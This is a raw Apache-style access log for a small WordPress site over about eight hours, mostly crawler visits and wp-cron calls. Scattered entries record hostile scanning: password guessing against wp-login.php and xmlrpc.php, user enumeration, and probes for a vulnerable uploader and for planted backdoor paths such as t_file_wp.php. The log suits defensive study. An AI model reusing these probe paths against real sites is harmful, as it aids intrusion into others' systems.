159.89.170.41 - - [01/Oct/2022:17:08:31 -0700] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "cargohs.com"
112.78.4.244 - - [01/Oct/2022:17:18:03 -0700] "POST /xmlrpc.php HTTP/1.1" 200 401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "cargohs.com"
10.247.24.55 - - [01/Oct/2022:17:18:06 -0700] "POST /wp-cron.php?doing_wp_cron=1664669886.7449879646301269531250 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664669886.7449879646301269531250" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
114.119.132.228 - - [01/Oct/2022:17:19:32 -0700] "GET /?p=148 HTTP/1.1" 200 25926 "https://www.cargohs.com/?cat=1" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:23:43 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:23:54 -0700] "GET / HTTP/1.1" 200 27576 "https://cargohs.com:443" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "www.cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:24:03 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:24:33 -0700] "GET / HTTP/1.1" 200 27576 "https://cargohs.com:443" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "www.cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:26:14 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:26:23 -0700] "GET / HTTP/1.1" 200 27576 "https://cargohs.com:443" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "www.cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:26:34 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "cargohs.com"
124.220.24.137 - - [01/Oct/2022:17:26:39 -0700] "GET / HTTP/1.1" 200 36344 "https://cargohs.com:443" "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "www.cargohs.com"
157.55.39.185 - - [01/Oct/2022:18:00:01 -0700] "GET /?p=1 HTTP/1.1" 200 18865 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
10.247.24.55 - - [01/Oct/2022:18:00:04 -0700] "POST /wp-cron.php?doing_wp_cron=1664672404.5852720737457275390625 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664672404.5852720737457275390625" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
103.131.71.22 - - [01/Oct/2022:18:41:26 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; coccocbot-image/1.0; +http://help.coccoc.com/searchengine)" "cargohs.com"
193.142.147.68 - - [01/Oct/2022:18:48:38 -0700] "GET /wp-login.php HTTP/1.1" 200 2952 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" "www.cargohs.com"
10.247.24.55 - - [01/Oct/2022:18:48:42 -0700] "POST /wp-cron.php?doing_wp_cron=1664675322.1745839118957519531250 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664675322.1745839118957519531250" "WordPress/5.0.17; http://www.cargohs.com" "www.cargohs.com"
185.49.20.77 - - [01/Oct/2022:18:49:02 -0700] "GET /wp-login.php HTTP/1.1" 200 2952 "http://cargohs.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "cargohs.com"
185.49.20.77 - - [01/Oct/2022:18:49:06 -0700] "GET //wp-json/wp/v2/users/ HTTP/1.1" 404 88 "http://cargohs.com///wp-json/wp/v2/users/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96" "cargohs.com"
193.142.147.68 - - [01/Oct/2022:18:50:32 -0700] "POST /wp-login.php HTTP/1.1" 200 3898 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331" "www.cargohs.com"
193.142.147.68 - - [01/Oct/2022:18:50:35 -0700] "POST /wp-login.php HTTP/1.1" 200 3898 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331" "www.cargohs.com"
193.142.147.68 - - [01/Oct/2022:18:50:38 -0700] "POST /wp-login.php HTTP/1.1" 200 3898 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331" "www.cargohs.com"
193.142.147.68 - - [01/Oct/2022:18:50:40 -0700] "POST /wp-login.php HTTP/1.1" 200 3898 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331" "www.cargohs.com"
10.247.24.56 - - [01/Oct/2022:19:08:12 -0700] "POST /wp-cron.php?doing_wp_cron=1664676492.4618339538574218750000 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664676492.4618339538574218750000" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
61.135.159.164 - - [01/Oct/2022:19:08:08 -0700] "GET / HTTP/1.1" 301 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "cargohs.com"
61.135.159.164 - - [01/Oct/2022:19:09:10 -0700] "GET / HTTP/1.1" 200 36340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
54.191.123.91 - - [01/Oct/2022:19:28:22 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "cargohs.com"
10.247.24.57 - - [01/Oct/2022:19:28:26 -0700] "POST /wp-cron.php?doing_wp_cron=1664677706.2416460514068603515625 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664677706.2416460514068603515625" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
35.162.35.2 - - [01/Oct/2022:19:28:27 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:20 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:21 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:22 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:24 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "www.cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:25 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "www.cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:26 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "www.cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:30 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:33 -0700] "GET /sitemap HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "www.cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:35 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:40 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "www.cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:44 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "cargohs.com"
162.55.85.228 - - [01/Oct/2022:19:44:48 -0700] "GET /sitemap.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)" "www.cargohs.com"
176.111.173.113 - - [01/Oct/2022:20:33:23 -0700] "GET /contact_us/ HTTP/1.1" 200 604910 "https://cargohs.com/contact_us/" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0" "cargohs.com"
176.111.173.113 - - [01/Oct/2022:20:33:25 -0700] "POST /contact_us/ HTTP/1.1" 200 604910 "https://cargohs.com/contact_us/" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0" "cargohs.com"
123.183.224.86 - - [01/Oct/2022:20:35:31 -0700] "GET / HTTP/1.1" 301 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "cargohs.com"
10.247.24.55 - - [01/Oct/2022:20:35:34 -0700] "POST /wp-cron.php?doing_wp_cron=1664681734.5309550762176513671875 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664681734.5309550762176513671875" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
49.7.21.113 - - [01/Oct/2022:20:46:44 -0700] "GET / HTTP/1.1" 301 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "cargohs.com"
49.7.21.113 - - [01/Oct/2022:20:46:52 -0700] "GET / HTTP/1.1" 200 36340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
123.125.109.45 - - [01/Oct/2022:20:56:26 -0700] "GET / HTTP/1.1" 200 36338 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
114.119.132.218 - - [01/Oct/2022:21:06:09 -0700] "GET /?feed=rss2 HTTP/1.1" 200 13096 "https://www.cargohs.com/?cat=1" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)" "www.cargohs.com"
195.191.219.132 - - [01/Oct/2022:21:29:57 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "cargohs.com"
195.191.219.132 - - [01/Oct/2022:21:30:01 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "cargohs.com"
10.247.24.57 - - [01/Oct/2022:21:30:05 -0700] "POST /wp-cron.php?doing_wp_cron=1664685004.7556800842285156250000 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664685004.7556800842285156250000" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
195.191.219.132 - - [01/Oct/2022:21:30:09 -0700] "GET /robots.txt HTTP/1.1" 404 73 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "www.cargohs.com"
195.191.219.132 - - [01/Oct/2022:21:30:11 -0700] "GET / HTTP/1.1" 200 36340 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "www.cargohs.com"
195.191.219.132 - - [01/Oct/2022:21:30:29 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "cargohs.com"
195.191.219.132 - - [01/Oct/2022:21:30:36 -0700] "GET / HTTP/1.1" 200 36342 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)" "www.cargohs.com"
54.236.1.11 - - [01/Oct/2022:21:55:10 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)" "cargohs.com"
54.236.1.11 - - [01/Oct/2022:21:55:10 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)" "cargohs.com"
54.236.1.11 - - [01/Oct/2022:21:55:10 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)" "cargohs.com"
54.236.1.11 - - [01/Oct/2022:21:55:15 -0700] "GET / HTTP/1.1" 200 36342 "-" "Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html)" "www.cargohs.com"
194.38.20.161 - - [01/Oct/2022:22:06:11 -0700] "GET /wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 404 73 "-" "ALittle Client" "cargohs.com"
49.7.20.86 - - [01/Oct/2022:22:09:03 -0700] "GET / HTTP/1.1" 301 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "cargohs.com"
49.7.20.86 - - [01/Oct/2022:22:10:33 -0700] "GET / HTTP/1.1" 200 36340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
41.216.188.48 - - [01/Oct/2022:22:17:11 -0700] "GET /wp-admin/css/ HTTP/1.1" 200 144 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "cargohs.com"
95.12.127.202 - - [01/Oct/2022:22:21:33 -0700] "GET /contact_us/ HTTP/1.1" 200 604910 "https://cargohs.com/contact_us/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49" "cargohs.com"
10.247.24.56 - - [01/Oct/2022:22:22:29 -0700] "POST /wp-cron.php?doing_wp_cron=1664688149.1244080066680908203125 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664688149.1244080066680908203125" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
40.88.21.235 - - [01/Oct/2022:22:22:25 -0700] "GET / HTTP/1.1" 200 36340 "https://www.cargohs.com/" "Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)" "www.cargohs.com"
10.247.24.55 - - [01/Oct/2022:23:09:15 -0700] "POST /wp-cron.php?doing_wp_cron=1664690955.1335439682006835937500 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664690955.1335439682006835937500" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
123.125.109.35 - - [01/Oct/2022:23:09:11 -0700] "GET / HTTP/1.1" 200 36340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
10.247.24.57 - - [01/Oct/2022:23:16:20 -0700] "POST /wp-cron.php?doing_wp_cron=1664691380.7142369747161865234375 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664691380.7142369747161865234375" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
37.139.53.81 - - [01/Oct/2022:23:16:17 -0700] "GET / HTTP/1.1" 200 36346 "https://www.cargohs.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4096.0 Safari/537.36" "www.cargohs.com"
37.139.53.81 - - [01/Oct/2022:23:16:27 -0700] "POST / HTTP/1.1" 200 33591 "https://www.cargohs.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4096.0 Safari/537.36" "www.cargohs.com"
192.144.198.95 - - [01/Oct/2022:23:37:52 -0700] "GET /wp-content/uploads/2019/02/chs-logo.png HTTP/1.1" 200 173881 "-" "python-requests/2.27.1" "www.cargohs.com"
176.58.112.114 - - [01/Oct/2022:23:47:03 -0700] "GET / HTTP/1.1" 301 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" "cargohs.com"
176.58.112.114 - - [01/Oct/2022:23:52:03 -0700] "GET / HTTP/1.1" 301 - "http://cargohs.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "cargohs.com"
176.58.112.114 - - [01/Oct/2022:23:52:09 -0700] "GET / HTTP/1.1" 301 - "http://cargohs.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "cargohs.com"
64.124.8.28 - - [02/Oct/2022:00:21:40 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "www.cargohs.com"
10.247.24.55 - - [02/Oct/2022:00:21:43 -0700] "POST /wp-cron.php?doing_wp_cron=1664695303.6526510715484619140625 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664695303.6526510715484619140625" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
64.124.8.28 - - [02/Oct/2022:00:21:40 -0700] "GET / HTTP/1.1" 200 36348 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36" "www.cargohs.com"
185.195.71.3 - - [02/Oct/2022:00:27:17 -0700] "GET /contact_us/ HTTP/1.1" 200 604910 "https://cargohs.com/contact_us/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "cargohs.com"
185.195.71.3 - - [02/Oct/2022:00:27:30 -0700] "POST /contact_us/ HTTP/1.1" 200 604910 "https://cargohs.com/contact_us/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "cargohs.com"
185.195.71.3 - - [02/Oct/2022:00:27:44 -0700] "GET /contact_us/ HTTP/1.1" 200 604910 "https://cargohs.com/contact_us/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36" "cargohs.com"
123.183.224.86 - - [02/Oct/2022:00:39:19 -0700] "GET / HTTP/1.1" 200 36340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
10.247.24.57 - - [02/Oct/2022:00:49:11 -0700] "POST /wp-cron.php?doing_wp_cron=1664696951.6723480224609375000000 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664696951.6723480224609375000000" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
123.183.224.86 - - [02/Oct/2022:00:49:08 -0700] "GET / HTTP/1.1" 200 36340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
123.183.224.86 - - [02/Oct/2022:00:52:20 -0700] "GET / HTTP/1.1" 200 36340 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
123.183.224.86 - - [02/Oct/2022:01:01:23 -0700] "GET / HTTP/1.1" 200 36338 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.cargohs.com"
157.55.39.185 - - [02/Oct/2022:01:08:26 -0700] "GET / HTTP/1.1" 200 36338 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
207.46.13.78 - - [02/Oct/2022:01:08:48 -0700] "GET /wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.extend.js?ver=1.9.2 HTTP/1.1" 200 348 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
207.46.13.78 - - [02/Oct/2022:01:08:48 -0700] "GET /wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.extra.min.js?ver=1.9.2 HTTP/1.1" 200 1547 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
157.55.39.68 - - [02/Oct/2022:01:08:51 -0700] "GET /wp-content/plugins/a3-lazy-load/assets/css/jquery.lazyloadxt.spinner.css?ver=5.0.17 HTTP/1.1" 200 175 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
157.55.39.84 - - [02/Oct/2022:01:08:53 -0700] "GET /wp-content/plugins/divi-builder/core/admin/js/common.js?ver=3.19.15 HTTP/1.1" 200 577 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
207.46.13.116 - - [02/Oct/2022:01:08:52 -0700] "GET /?et_core_page_resource=et-core-unified-cached-inline-styles174 HTTP/1.1" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "www.cargohs.com"
207.46.13.116 - - [02/Oct/2022:01:08:55 -0700] "GET /wp-content/cache/et/174/et-core-unified-16633801621553.min.css HTTP/1.1" 200 5022 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
207.46.13.116 - - [02/Oct/2022:01:08:56 -0700] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.0.17 HTTP/1.1" 200 4347 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
40.77.167.64 - - [02/Oct/2022:01:08:57 -0700] "GET /wp-content/themes/Divi/style.css?ver=3.19.15 HTTP/1.1" 200 67334 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" "www.cargohs.com"
40.77.167.64 - - [02/Oct/2022:01:08:57 -0700] "GET /wp-content/uploads/sass/a3_lazy_load.min.css?ver=1521939926 HTTP/1.1" 200 112 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
157.55.39.68 - - [02/Oct/2022:01:09:04 -0700] "GET /wp-content/plugins/a3-lazy-load/assets/js/jquery.lazyloadxt.srcset.min.js?ver=1.9.2 HTTP/1.1" 200 703 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
157.55.39.84 - - [02/Oct/2022:01:09:08 -0700] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.0.17 HTTP/1.1" 200 4302 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
157.55.39.84 - - [02/Oct/2022:01:09:08 -0700] "GET /wp-includes/js/wp-embed.min.js?ver=5.0.17 HTTP/1.1" 200 739 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
40.77.167.105 - - [02/Oct/2022:01:15:27 -0700] "GET /robots.txt HTTP/1.1" 404 88 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" "www.cargohs.com"
10.247.24.55 - - [02/Oct/2022:01:24:39 -0700] "POST /wp-cron.php?doing_wp_cron=1664699079.3578588962554931640625 HTTP/1.1" 200 - "https://www.cargohs.com/wp-cron.php?doing_wp_cron=1664699079.3578588962554931640625" "WordPress/5.0.17; https://www.cargohs.com" "www.cargohs.com"
40.77.202.153 - - [02/Oct/2022:01:24:43 -0700] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" "www.cargohs.com"
40.77.202.160 - - [02/Oct/2022:01:24:43 -0700] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 96874 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" "www.cargohs.com"
40.77.202.91 - - [02/Oct/2022:01:24:44 -0700] "GET /wp-content/themes/Divi/js/custom.min.js?ver=3.19.15 HTTP/1.1" 200 263633 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" "www.cargohs.com"
156.146.63.142 - - [02/Oct/2022:01:24:36 -0700] "GET / HTTP/1.1" 200 36348 "https://www.cargohs.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "www.cargohs.com"
40.77.202.160 - - [02/Oct/2022:01:24:46 -0700] "GET /wp-content/themes/Divi/core/admin/fonts/modules.ttf HTTP/1.1" 200 92400 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" "www.cargohs.com"
156.146.63.142 - - [02/Oct/2022:01:24:45 -0700] "POST / HTTP/1.1" 200 33591 "https://www.cargohs.com/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "www.cargohs.com"
109.206.241.123 - - [02/Oct/2022:01:25:23 -0700] "GET /wp-admin/css/ HTTP/1.1" 200 144 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "www.cargohs.com"
116.203.250.67 - - [02/Oct/2022:01:26:44 -0700] "GET /style.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "cargohs.com"
116.203.250.67 - - [02/Oct/2022:01:26:57 -0700] "GET /moduless.php HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "cargohs.com"
116.203.250.67 - - [02/Oct/2022:01:27:00 -0700] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 88 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "cargohs.com"
